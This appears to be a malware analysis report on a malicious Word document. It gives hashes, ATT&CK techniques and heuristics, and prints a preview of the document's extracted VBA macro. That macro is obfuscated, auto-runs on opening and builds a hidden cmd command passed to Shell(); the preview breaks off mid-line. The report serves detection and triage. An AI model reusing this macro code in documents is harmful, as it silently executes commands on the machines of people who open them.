Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ee36c1239bfffed1…

MALICIOUS

Office (OLE)

Size: 162.8 KB
Created: 2018-07-17 22:13:00
Authoring application: Microsoft Office Word
First seen: 2019-03-10
MD5: b8b85cf371469d84043bb6b87494bc1e
SHA-1: 779fdbde234d4df9a774fa9bd4f68bfc94ed16e3
SHA-256: ee36c1239bfffed188c3fddb35fba8f1ea519828d16e9e46a957bba5cd2713f9
Risk Score: 162

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is an OLE document with a high percentage of slack space, which indicates possible obfuscation or embedded content. A critical-severity heuristic fires on a Shell() call inside a Document_Open VBA macro, so the macro runs a command as soon as the document is opened; the macro is built to execute an arbitrary command string, which strongly suggests it is used to download and execute a secondary payload. No specific family could be identified, but the technique is common for initial payload delivery.

Heuristics (5)

  • VBA macros detected [medium] OLE_VBA_MACROS (2 related findings)
    Document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    A Shell() call is present in the VBA macro code.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    A Document_Open auto-execute macro is present.
  • OLE document has large unaccounted-for region [high] OLE_SLACK_ANOMALY
    The OLE file is 166,656 bytes but its declared streams total only 56,811 bytes; the remaining 109,845 bytes (66%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 29875 bytes
SHA-256: 61b2ba2f72ffb24c056ad4f02e36c660980abc7aaa2a825cb97909c7547b075a

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "RdPbsOuRpc"
Function PYcjwdrWVGcj()
   OjZFz = NwIbm * rbjUw * (84365 * jdUulj + 41869 + wwLjba)
   OkOWv = QwmiPv * QJwoO * (40166 * TwnRm + 43412 + RCLBjq)
   FIObL = jjScE * VRBofi * (70216 * GVqDH + 42566 + MlrGLj)
   SzEVj = (77164 / JjhiZu - 20895 - aBwBb * poWcXO * zrKkAE - WrVLu / KKDFwm)
   vVhChC = tzkzO * ftoRJ * (98043 * OEiHLX + 40245 + NjzHL)
   KCThS = QmuTC * bNWRN * (28011 * nRwzkZ + 14049 + vbjjFR)
   nEFZm = tZhcV * vlBXJ * (38235 * BkSKTp + 32282 + uaWtt)
   vjMAkH = Azbtu * hsSvS * (63215 * qmZrKh + 98600 + NnqCoE)
End Function
Function icYQdcIitMZp()
   XtYqtj = (66075 / nGljil - 32648 - kaGMJh * kapOJ * wVzwSj - XwuHC / oSiuw)
   BbMvjs = (18998 / jUBwiu - 18628 - qrmsHT * Pccok * LRmCGj - bkkZjv / rEmQUi)
   hrJmSL = (11914 / Sjqdwp - 67650 - NihoTO * mbNdZ * pNfFt - NXDYj / hEhHG)
   OcwiA = (67167 / ioQDVZ - 5789 - lmkLEF * ojzJF * tFjqrr - WWQzk / cifqld)
   zwdHwL = (61048 / WWLFi - 63294 - cVLXCd * MJFAh * JnfUSp - MMGiu / srAsT)
End Function
Function uCqKMmUvRpQDut(UWYNQSMEN)
On Error Resume Next
   TiKzT = EYAXD * tYKbH + 12398 - 12052 + 25773 * LqYKp - UCVBP / wmBXi - dUHvF / ptsJHA
   sFCQha = bJXSVu * wTlCs + 15627 - 39854 + 97323 * ipANJ - zkBMNl / iaGJK - HMiKB / CimMZS
   tIrmm = ukWiVn * zlIEd + 79856 - 54582 + 85590 * PljVw - KuUwU / CdKkrn - kkRjBj / GACXOS
aGQSnvIT = Shell(UWYNQSMEN, 35373193 - 35373193)
   hwJZBP = OoitWK * nEnvR + 63402 - 56740 + 59514 * wMjHma - onuDsz / zuJdnf - ObQuBP / HwnSC
   TbjMQ = MnQIhW * kKvjzM + 82536 - 80775 + 98501 * zOHKLX - utrAOz / wtYvY - BUcIz / QpUHCN
End Function
Function RHCoCqGc()
   ZHbqV = blKvYP * bDVHmN + 96896 - 22913 + 57526 * KVrzt - ldHzjj / Jlhrwp - wsOBhL / PBrzov
   zOpPzi = rBOMJ * UFBLio + 50113 - 51805 + 81686 * sjsqd - uDZflr / NuRDN - ZkjbwS / vJPdfT
   qUnBID = zoklTN * KRhrGk + 80181 - 72062 + 47918 * cBbzdH - zIRLv / FnkcDY - bwuRdl / OVXnE
   VihhI = SRQEv * MWEVz + 42999 - 80233 + 13723 * HpSid - bPBrl / rQCKRh - jawwl / nszVwS
End Function


Attribute VB_Name = "rkoiVPAkzho"
Function waafif()
On Error Resume Next
PMLcF = (USBvKM + rmIqN + TijwKK - INmCc - YlZkJN / jpNzqC + 24557 * cNbVv)
   IXLhjd = QLcKil - 45709 / fcMXOl - LGpwUq * 5255 * JfwmNZ * 35528 + zkMJO
   qjOBR = (pHfwTb + TRCzcQ + iRlIHz - fAKhjz - utWHw / uhhzX + 52646 * uLKcs)
wWFdPcz = CStr(Chr(LSdvXjfUFGIWI + mcfRHsQJ + 109 + LOicizdFVbBR + jXZnKLAQw)) + "d " + "/" + CStr(Chr(jYwzwuJOMMU + XJfQnoKUHNkjT + 99 + DiuQZwwYhHWjrD + MWhQBjj)) + " f^Or" + "  ;" + " /^F  " + "; ; " + CStr(Chr(uLcKLNfR + iRDbwYkw + 34 + ISRwIXMlM + wSHikWNVtr)) + "   " + "deli" + CStr(Chr(rdoIvlrRiaL + udCoAuFOofz + 109 + LCWdOZslZUUORz + oYGGBqsLhsz)) + "s" + "=T6F"
oHVOvn = (RmbkSS + YQfEz + VXEzj - khKwdj - Xjsuz / ZuJaGA + 62292 * ROOFG)
   YuFuUs = (GUQmc + ZXjsjK + wkmkjY - UpipB - QVzQN / NkaMil + 98550 * UnikLU)
dRDukrAhzjO = "H toke" + "ns=  " + "+" + "2 " + CStr(Chr(DwpMzapvF + IqUIiZjukjzH + 34 + vVJKvWciUWWfB + ikjMUwKWkd)) + "  ," + "  %^" + "x ; " + " , In " + ", (  ;" + " " + ";"
BmHwjc = 90019 - tZizFL - 39500 + WjBjq * ubtHv / pwODA - 68400 - JqCTi
   RCVhM = 4880 - HnwDz - 90417 + fVfYX * MwwzA / TSvtW - 18992 - zPqZRU
hUMZwZ = " '" + " ; " + "; " + " ^" + "^Ft^^Y" + "PE ;" + "  ^| " + " " + "; ^^" + "FinDst"
UnKmo = 90360 - CkTouq - 86380 + DYhnuz * fzWBK / UMSKI - 17769 - ojVGM
TwpanGGOGdw = "r  " + ",  ; " + " ^" + "^SHC " + " '"
aTEPf = 47205 - TbcLF - 69488 + CmzSfs * IzBcOX / FqYMGj - 5424 - cDMvz
   kMpTQK = 98386 - BkoFJI - 20989 + nkZiX * dmhTs / DabrD - 64501 - nhhtBV
fvniEitE = " ; " + "; ) ; " + "D^O " + " " + "," + " ,  " + "%" + "^x" + ",   ,"
rlwaPv = 88513 - tOKsc - 17590 + ukCcF * XInsnM / TCqPbS - 17521 - njiKqU
   rcKEi = 89442 - ipZrRW - 4318 + QBXNlE * zBjjJu / kuTIi - 19559 - ESDLup
vuPZnQlUUkw = " k2D" + "/V^4" + "^5" + "FV" + "C  "
RXvuJ = 51101 - MRBUcJ - 66699 + jLGqYu * JAdHB / SOJzO - 28287 - QRnKcz
brVHHG = "  ,  ," + " " + "n0XEyw" + "g" + "5" + CStr(Chr(CZiDqwXC + kJpJZWzmDXPV + 109 + QvXrkzYhoMZJlS + iRUzAaWLZnYz)) + "/^r " + CStr(Chr(uhSjnuZjRGHC + jPk
... (truncated)